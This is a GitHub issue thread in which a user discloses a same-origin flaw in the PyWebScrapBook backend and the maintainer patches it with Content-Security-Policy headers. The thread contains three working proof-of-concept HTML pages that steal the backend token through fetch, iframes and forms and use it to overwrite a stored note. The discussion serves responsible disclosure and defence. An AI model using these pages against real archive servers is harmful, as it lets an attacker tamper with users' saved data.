Extension and browser must use distinct "Origin" #16

maxnikulin · 2020-08-26T04:57:29Z

I am considering the following as a quite serious security flaw. The least important consequence is self-destructing captures, but I am afraid of damaging of the whole archive.

My opinion is that extension (capture and edit) and browser (view content) context should be strictly separated. Ordinary browser windows should have credentials allowing only view of saved pages. Saving of new pages or editing of them should be available from extension code only.

Fully configured backend should use different domains for API and for saved content. In quick/developer setup mode it could be at least different ports of localhost. Personally I consider using dnsmasq and separate subdomain for each saved page.

Prerequisite: JS script is leaked somehow from origin page to the capture. It is hard to ensure that all scripts are cleaned even when the related option is set.

Let's assume that there is a note /data/20200825072842466/index.md on the server. In real life URL could be obtained from the directory index.

I have put the following file to another directory simulating leak of JavaScript to the saved file:

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>webscrapbook backend hack</title>
</head> 
<body>  
        <h1>WebScrapBook backend hack</h1>
        <pre id="log"></pre>
        <script type="text/javascript">
                const hackTarget = '/data/20200825072842466/index.md';
                var log = document.getElementById("log");

                function logError(e) {
                        console.error(e);
                        log.innerText += "\nError:\n" + e + "\n";
                }

                function logSuccess(r) {
                        console.log(r);
                        log.innerText += "\nSuccess:\n" + r + "\n";
                }

                async function hackIt() {
                        const token = (await (await fetch("/?a=token&f=json")).json()).data;
                        logSuccess("token: " + token);
                        const d = new FormData();
                        d.append("token", token);
                        const text = "hacked at " + new Date();
                        d.append("text", text);
                        const res = (await (await fetch(
                                hackTarget + '?a=save&f=json',
                                {method: 'POST', body: d})).json()).data;
                        logSuccess("result: " + res);
                        logSuccess("hacked: " + hackTarget + "\nSet: " + text);
                }

                hackIt().catch(logError);
        </script>
</body>
</html>

I have clicked on this page in the WebScrapBook sidebar and got another page overwritten.

I believe that a separate WSGI application without support of modifying actions is required to serve saved pages for visiting them. In the case of "production" setup with reverse proxy application role shrinks to checking of authentication and rendering of markdown notes. Static files could be served by the reverse proxy directly. Different origin (host or port) is necessary to prevent CORS attacks.

The text was updated successfully, but these errors were encountered:

danny0838 · 2020-08-26T08:48:25Z

I agree that using same origin for backend API and serving captured pages can open a security hole as you described, although it may not be too common as it requires an intentional XSS-ing site and the user to capture such web page without purging scripts, which is the default WSB capture setting.

However, serving multiple ports/hosts for the backend would significantly increase the difficulty for the user to set up, and it also requires a large code reworking. Furthermore, PyWebScrapBook also provides a web interface itself, which can be accessed by visiting a served directory like http://localhost:8384/data, so that the user can modify the database without the WebScrapBook browser extension. Using different origin would also break this.

Before we've come up with a full solution, for now I think we can take advantage of the connect-src content security policy, which restricts the browser to connect via scripts. We can add a Content-Security-Policy: connect-src 'none'; header for all served markdown pages and static files, and not for other web interface pages, to prevent such security hazard, with some caveats:

Content-Security-Policy requires a supporting modern browser to work. According to the MDN doc it's supported by Chrome >=25, Firefox >= 23, and most mobile browsers. This should be able to cover most use cases.
This will break a good script in the captured page that accesses sibling resources from the same origin. However, since the context of a page is already changed largely when captured and any AJAX in the captured page is known to hardly expected to work, this very little additional break is not likely a big issue.

maxnikulin · 2020-08-27T04:06:41Z

It seems I found a recipe for quick plumbing if web interface is not necessary. Unlike captured pages, the extension does not send Referer, so I could block token requests if request.referrer is not None.

I do not think it is really hard for users to add another optional (but highly recommended) section to config with another host and port. By default view and manage interfaces could share the same origin. There is no problem to start another thread with addition WSGI server in the code. During extension setup it is better to allow user to specify any address and to fetch the counterpart using a dedicated API method.

Administrative part of web interface may share origin with address for API requests from the extension but it should not be the same as origin to view saved pages.

In the backend code series of if action == ... should be anyway rewritten to registering of actions in a "general purpose" API method handler. That should make easy to support unified/separated modes. It is hard for me to estimate amount of work in the extension code to allow distinct URLs for page viewing.

danny0838 · 2020-08-27T04:25:08Z

What do you think about the CSP approach mentioned above?

A quick test shows it does can help block AJAX requests from captured pages. If there's no significant flaw we may implement it for now. As for full redesign for separated view/administration, it is nothing a small work and may pend until we've got time.

maxnikulin · 2020-08-27T12:00:14Z

Sorry for the delay. I realized that I have no solid picture how to use Content-Security-Policy and Access-Control-*
headers to prevent CSRF attacks.

Your Idea with connect-src helps against my first variant of the page but the variant below still "works".

Actually restrictive Content-Security-Policy is the reason why I would like to have subdomain per saved page. At least managed by uMatrix.

After reading "Cross-Site Request Forgery Prevention Cheat Sheet"
https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#double-submit-cookie
I am considering "double submit cookie": credentials sent through headers are shared by whole domain but a cookie could be restricted to particular directories using path.

Let's obtain a token using iframe and perform an action by submitting a form.

<!DOCTYPE html>
<html data-scrapbook-type="note">
<head>
<meta charset="UTF-8">
<meta http-equiv="Content-Security-Policy" content="connect-src 'none';">
<title data-scrapbook-elem="title">WSB frame hack</title>
</head>
<body>
        <h1>WebScrapBook iframe hack</h1>
        <iframe src="/?a=token&f=json"></iframe>
        <div>
        <form id="form" action='/data/20200825072842466/index.md?a=save&f=json' method="POST">
                <label>Token <input name="token" id="token"></label>
                <label>Replacement text <input name="text" value="Hacked using form"></label>
                <button type="submit" id="submitit">Hack it!</button>
        </form>
        </div>
        <div>
        <pre id="log"></pre>
        </div>
        <script type="text/javascript">
                const hackTarget = '/data/20200825072842466/index.md';
                var log = document.getElementById("log");
                var tokenInput = document.getElementById("token");
                var form = document.getElementById("form");

                function logError(e) {
                        console.error(e);
                        log.innerText += "\nError:\n" + e + "\n";
                }

                async function hackIt() {
                        const token = JSON.parse(window.frames[0].document.body.innerText).data;
                        tokenInput.value = token;
                        form.submit();
                }

                setTimeout(() => hackIt().catch(logError), 1000);
        </script>
</body>
</html>

danny0838 · 2020-08-27T13:37:10Z

Good point. Can we prevent this by restricting token to be POST only?

maxnikulin · 2020-08-28T03:45:58Z

You are approaching to the limit of my creativity. Though I am not a pentester and do not have a ready to use cookbook or automatic tools. Single origin approach is fragile. Next time I could miss a way to overcome suggested protection. It will be even more harder to maintain achieved level of security during unavoidable modifications of code.

Token could be obtained with POST method using a form inside iframe. Certainly scripts could be completely disabled on the captured pages and it will work in significant amount of pages. However it will break pages with self-contained JavaScript not requiring external resources.

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="connect-src 'none';">
<meta charset="UTF-8">
<title>WebScrapBook double form hack</title>
</head> 
<body>          
        <h1>WebScrapBook double form hack</h1>
        <div>   
                <iframe src="index.html"></iframe>
        </div>
        <div>
                <form id="tokenForm" action="/?a=token&f=json" method="POST">
                        Form to fetch token
                </form>
        </div>
        <div>
        <form id="overwriteForm" action='/data/20200825072842466/index.md?a=save&f=json' method="POST">
                <label>Token <input name="token" id="token"></label>
                <label>Replacement text <input name="text" value="Hacked using double form"></label>
                <button type="submit" id="submitit">Hack it!</button>
        </form>
        </div>
        <script type="text/javascript">
                const hackTarget = '/data/20200825072842466/index.md';
                var log = document.getElementById("log");
                var tokenInput = document.getElementById("token");
                var overwriteForm = document.getElementById("overwriteForm");
                var tokenForm = document.getElementById("tokenForm");

                function logError(e) {
                        console.error(e);
                        log.innerText += "\nError:\n" + e + "\n";
                }

                async function hackIt() {
                        const token = JSON.parse(window.frames[0].document.body.innerText).data;
                        tokenInput.value = token;
                        overwriteForm.submit();
                }

                if (window.parent == window) {
                        setTimeout(() => hackIt().catch(logError), 1000);
                } else {
                        tokenForm.submit();
                }
        </script>
</body>
</html>

maxnikulin · 2020-08-28T05:51:52Z

There is form-action CSP directive
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/form-action
however there is no way to say "not origin". I suspect that it is a valid case when some page is stored to have quick access to some content selector implemented through HTML form.

maxnikulin · 2020-08-29T04:52:54Z

Obviously I was wrong with

It seems I found a recipe for quick plumbing if web interface is not necessary. Unlike captured pages, the extension does not send Referer, so I could block token requests if request.referrer is not None.

since {referrerPolicy: 'no-referrer'} could be passed to token fetch.

danny0838 · 2020-08-29T05:31:00Z

If the user can't guard himself from capturing a page with malicious scripts, there's not too much thing we can do.

Even if viewing and administrating are origin separated, a malicious script in the database can still do many bad things, such as mining, generating phising or CSRF links, auto-downloading malwares, or scanning the whole scrapbook and stealing everything to a remote server.

In this aspect, CSP may provide more protect ion than separating origin by disallowing connection.

I think form action is something that should be forbidden or at least limited, as the intension of a capturing page containing a form are more likely to get a static reference instead of a working form, which could lose the original context and be dangerous if accidentally submitted and the server of the source page doesn't guard against such CSRF-like behavior.

Still another leak is that a malicious script can send offending requests via controlling a privileged page by framing it. We probably need to apply CSP for the whole scrapbook site and exempt the privileged scripts by inlining them and using the sha-* directive. This seems somehow ugly but is the only way I can think of currently.

Another thing is to restrict framing so that a malicious script can't happily scan the whole site and send data to external by framing. This is doesn't seem easy as we don't want to block framing of normally captured web pages, which can contain frames from same or different origin.

maxnikulin · 2020-09-01T04:42:17Z

In this aspect, CSP may provide more protection than separating origin by disallowing connection.

That is exactly the reason why I am asking for separated origins. I want to delegate CSP management to uMatrix that offers decent user interface for granular permissions or to NoScript that is more simple. If it is possible to serve different pages from distinct subdomains, it will be easy to set restrictive default policy and to enable scripts for particular pages.

danny0838 · 2020-09-01T07:43:25Z

I don't think requiring an external browser extension is a solution. Additionally, if uMatrix can easily restrict scripts for particular pages, can't it do so when origin not separated?

Further investigation shows that sha-* directive is not supported for connect-src, at least currently. A workaround CSP I can think of currently is:

Add Content-Security-Policy: form-action 'none'; connect-src 'none'; for static files and markdown pages.
Add Content-Security-Policy: frame-ancestors 'none'; and compatible X-Frame-Options: deny for other “privileged” pages.

This should be able to block all undesired requests from a potentially malicious script, with a side effect that AJAX and forms are not allowed for captured scripted pages. Can you check if there's still a possible leak?

Additionally, we may add an app.csp config, which is default to true, so that the user can disable the CSP restriction if he really want to.

maxnikulin · 2020-09-04T06:07:57Z

Unfortunately it seems impossible to define path-specific CSP in uMatrix. (At least I could not figure out how to do it and there is gorhill/uMatrix#734) So convenient interface exist only for per-domain granularity. Even separating scapbook management interface and captured content makes protection more reliable. I consider subdomain per captured page as an extreme case.

I do not think that relying to some extent to other extensions is bad. In my opinion it is better to concentrate on accuracy of capture and convenience of collection management, of course, having security in mind.

I was disappointed that Firefox does not support script-src integrity for external scripts. And I could not figure out how connect-src could be combined with hashes for dynamic content.

As to forms, besides submitting of user data, I have seen an interface to a site archive implemented as a form to allow selection of interesting period. Sorry, I do not remember a link.

I have not got an idea how to bypass form-action 'none'; connect-src 'none' + frame-ancestors 'none' protection yet. Fortunately server header have precedence over <meta http-equiv=...>.

danny0838 · 2020-09-04T17:26:20Z

I do not think that relying to some extent to other extensions is bad. In my opinion it is better to concentrate on accuracy of capture and convenience of collection management, of course, having security in mind.

Well, it's not so true to rely on a third party tool for basic security. We should implement basic security guard by default, possibly with options to turn then off if it would conflict with other tools with enhanced features.

As to forms, besides submitting of user data, I have seen an interface to a site archive implemented as a form to allow selection of interesting period. Sorry, I do not remember a link.

CSP only blocks the request from a form action. If the interfaceis implemented with javascript that listens to a form submit event and do its handling, it will not be affected by CSP. OTOH, a javascript:... form action will indeed be blocked by CSP, but it should be an anti-pattern for most javascript based forms.

I have not got an idea how to bypass form-action 'none'; connect-src 'none' + frame-ancestors 'none' protection yet. Fortunately server header have precedence over <meta http-equiv=...>.

That's good. We will probably go for this, at least for now.

danny0838 · 2020-09-14T11:48:33Z

Implemented CSP in 0.20.0

maxnikulin · 2020-09-22T05:01:00Z

Sorry for the late response. I have checked that 3 my examples do not work with PyWebScrapBook-0.21.1 backend. Thank you for the CSP fix.

If you do not mind, I would keep this issue open for a while, but I am not expecting particular actions from you currently. I hope, I will look into relevant parts of code more closely to get some impression concerning separation of API and view endpoints.

danny0838 added the enhancement New feature or request label Aug 26, 2020

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Extension and browser must use distinct "Origin" #16

Extension and browser must use distinct "Origin" #16

maxnikulin commented Aug 26, 2020

danny0838 commented Aug 26, 2020 •

edited

Loading

maxnikulin commented Aug 27, 2020 •

edited

Loading

danny0838 commented Aug 27, 2020 •

edited

Loading

maxnikulin commented Aug 27, 2020

danny0838 commented Aug 27, 2020 •

edited

Loading

maxnikulin commented Aug 28, 2020

maxnikulin commented Aug 28, 2020

maxnikulin commented Aug 29, 2020

danny0838 commented Aug 29, 2020 •

edited

Loading

maxnikulin commented Sep 1, 2020

danny0838 commented Sep 1, 2020

maxnikulin commented Sep 4, 2020

danny0838 commented Sep 4, 2020

danny0838 commented Sep 14, 2020

maxnikulin commented Sep 22, 2020

Extension and browser must use distinct "Origin" #16

Extension and browser must use distinct "Origin" #16

Comments

maxnikulin commented Aug 26, 2020

danny0838 commented Aug 26, 2020 • edited Loading

maxnikulin commented Aug 27, 2020 • edited Loading

danny0838 commented Aug 27, 2020 • edited Loading

maxnikulin commented Aug 27, 2020

danny0838 commented Aug 27, 2020 • edited Loading

maxnikulin commented Aug 28, 2020

maxnikulin commented Aug 28, 2020

maxnikulin commented Aug 29, 2020

danny0838 commented Aug 29, 2020 • edited Loading

maxnikulin commented Sep 1, 2020

danny0838 commented Sep 1, 2020

maxnikulin commented Sep 4, 2020

danny0838 commented Sep 4, 2020

danny0838 commented Sep 14, 2020

maxnikulin commented Sep 22, 2020

danny0838 commented Aug 26, 2020 •

edited

Loading

maxnikulin commented Aug 27, 2020 •

edited

Loading

danny0838 commented Aug 27, 2020 •

edited

Loading

danny0838 commented Aug 27, 2020 •

edited

Loading

danny0838 commented Aug 29, 2020 •

edited

Loading